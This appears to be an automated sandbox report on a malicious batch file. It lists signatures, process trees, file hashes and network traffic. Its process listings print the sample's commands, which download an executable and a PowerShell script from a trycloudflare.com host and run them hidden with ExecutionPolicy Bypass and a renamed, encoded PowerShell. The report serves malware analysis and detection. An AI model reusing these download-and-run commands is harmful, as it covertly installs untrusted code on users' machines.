Analysis Overview
SHA256
ddf7f8e12308ee481e883416af7cc1a19e7ce5feee7a69b3267f9d40480fe7b6
Threat Level: Known bad
The file run_script.bat was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Executes dropped EXE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 11:27
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 11:27
Reported
2024-11-13 11:29
Platform
win7-20240903-en
Max time kernel
117s
Max time network
119s
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\run_script.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 4222af73b1775a156ec77fb80b99f0fb |
| SHA1 | fc823804ca071b6d011bf647064fa6e40ecfd4cd |
| SHA256 | 5f19d3970796ae6453315c3dc837ea68f11e949c1017012ea695e1206ccaa3ae |
| SHA512 | 26fabd321d73ec1a2e21ee4c869155f918c83a98869017f11d105ab6caedd42613742dc27cda8da9d604fb6206efeaa158526b376f629ed8fee59bea16e9ad22 |
memory/2952-18-0x000000001B4A0000-0x000000001B782000-memory.dmp
memory/2952-19-0x0000000001D00000-0x0000000001D08000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 11:27
Reported
2024-11-13 11:29
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
137s
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\cmd.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\system32\wscript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\run_script.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe
"C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe" powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs"
C:\Windows\system32\cmd.exe
cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe" /Y
C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe
"C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe" -enc [base64-encoded PowerShell command blob omitted]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | visits-marie-dial-feet.trycloudflare.com | udp |
| US | 104.16.231.132:443 | visits-marie-dial-feet.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.231.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 104.16.231.132:443 | visits-marie-dial-feet.trycloudflare.com | tcp |
| US | 104.16.231.132:443 | visits-marie-dial-feet.trycloudflare.com | tcp |
| US | 104.16.231.132:443 | visits-marie-dial-feet.trycloudflare.com | tcp |
| US | 104.16.231.132:443 | visits-marie-dial-feet.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/4704-0-0x00007FFFA5FC3000-0x00007FFFA5FC5000-memory.dmp
memory/4704-6-0x0000029933870000-0x0000029933892000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wow5m3lp.dx5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4704-11-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
memory/4704-12-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
memory/4704-16-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/1836-18-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
memory/1836-19-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
memory/1836-29-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7ab00d2b8ad3a0a8426f6a535086b700 |
| SHA1 | 5b912f4345328372093354ff2ba6a932fef4a8ab |
| SHA256 | cc27d1633ff5a4401c75569e6cd8f98e7ab09f01b8dfb0399f82efe197e0ca0c |
| SHA512 | 839e5fbdcc406cee2f37a156ccbb772a80a0231508a7925f95e162990b31ea8366442fcd6073c9035905b47a34d60a3434cc776babf9d49521663b8d3e400584 |
C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1836-34-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8356d1901292ab1c540c91fc5a566e1 |
| SHA1 | 43f7ebcae8fd258f2e704dceea5d279e228469de |
| SHA256 | 90af996df16e4574d32f3bd46cdedef8d4c8b2595accbb224b411320068bb7b9 |
| SHA512 | e54b149b66a89a736aa9f626358077072941eb210e220e6fe4550be1d124b0c28d2c5c1726ce3ef45e38a280567df3235555773a84a2d1e1e463582c2c1a366e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a9725150c8400bf8023c6671a37eb561 |
| SHA1 | 4cd6ddf574e66e050bcff972c4fa589a5681d489 |
| SHA256 | 4b732ad5f05c545c9b5dab1ede2a28a905420916e959adf134883472d6549849 |
| SHA512 | add22f987e004d6a69be0e7f295ae9af797e3506755e32e11b6f01de8b2a551a28b174f0a04fb18afa671060638b533b7de944cd69056999e223cda6da91a45f |
C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe
| MD5 | e897cfb1731bc4c02fbd563788ce1275 |
| SHA1 | 74645248152ed5c29a80da620cb7d2707f5dc3c8 |
| SHA256 | 4ae7b909888f9609760754e021f4277680f915d8bd56207b9e589bf4314ebdaf |
| SHA512 | 2f3249747a16d9c72bfcc4abc8e4bb49940350b38fec45971d2b6092299ca6ba8ebb8b12d92e67c0de33298dca3d977f5f1e4d83fb391bd09ffeda69b351647e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ecfad053723f0fcfa5277e7f671671ac |
| SHA1 | 5cae19229a7a728cc4906ef4d7dedf518922cbad |
| SHA256 | 04b65887a9f0eefb8ec5b26bf1db84cd2296ca1a567c02ebaab1e3e8b660db6a |
| SHA512 | 319840d9b514b3f43e79cf3fe18b87e3e3478eceed8a7c27253f4a864e43fda2c49231284219e86bd4975b61c971fc60856eed8f7314e398b88798feeef71554 |
C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1
| MD5 | d3bdd166f49c5b37636eb5b6b4993a4c |
| SHA1 | b88e949bd3da41e95c53e4bacbeb80eebedf7c84 |
| SHA256 | 12828ef571dd470d640d01d43d6633ca26451363fbb051b229b1fcd607ffabd3 |
| SHA512 | 5b393fd5fa94ca832ef337aca23f446a3166526dd6dfd9c885b9995424cf37e0494de98ef3755cf3ea97dcf99b7cc6652f685396cfd2751b8d1837c06e19e304 |
memory/5052-74-0x000002747CA90000-0x000002747CC52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs
| MD5 | f1ca0c7256a310623187a8a12afc0d69 |
| SHA1 | 6c8d587f756b9ecdfec1e4ac2fca23669fe54a55 |
| SHA256 | fcfd5a286406b4b7890106cd0f477c54c82e33adad15da91e7c69ab58d671b3f |
| SHA512 | e947d90e1fde8118da7f807d52f9c9b3a013a84785c327ac311c481e25e2aaf986fafde3ad7ad80350e2085cad420ea0b9325b9e0e2c75e3843acea7ee1bad2d |
C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs
| MD5 | 84c74bd0c10be16a52e54848ffa7f34d |
| SHA1 | 2eec57a1371c9bfbf69c9bbb265cfe2371338cfc |
| SHA256 | 30b571975bdf3155e07ce09bccac43f7dad05ed7ac8fba5de86d2d07dfd5bece |
| SHA512 | 5c8deaf26c3af928b2d284affffdd60d95ee67998f97b46d4ca004d1d4fa86a64d586574eebb6274e3ed46e035cd02303df940d194ac0010dc4ae5da90a15e69 |
C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0ff0a78b0521dfc375c4d78525b8f265 |
| SHA1 | c5d6bc71f293c137af7aad17f950cbc59da2abb8 |
| SHA256 | 5e5af018d697b29c49202462dfc0c41f4d46c340ca3a00cb987e55a6b04ad531 |
| SHA512 | 9740c28c5f09e2ebe5ef825dabe91af6868e0a0d612064cc1a43936f5d87d3452e35ce87d7f5a0887c142e53e04d1d8462744322a13577aff83d0b4f55171d70 |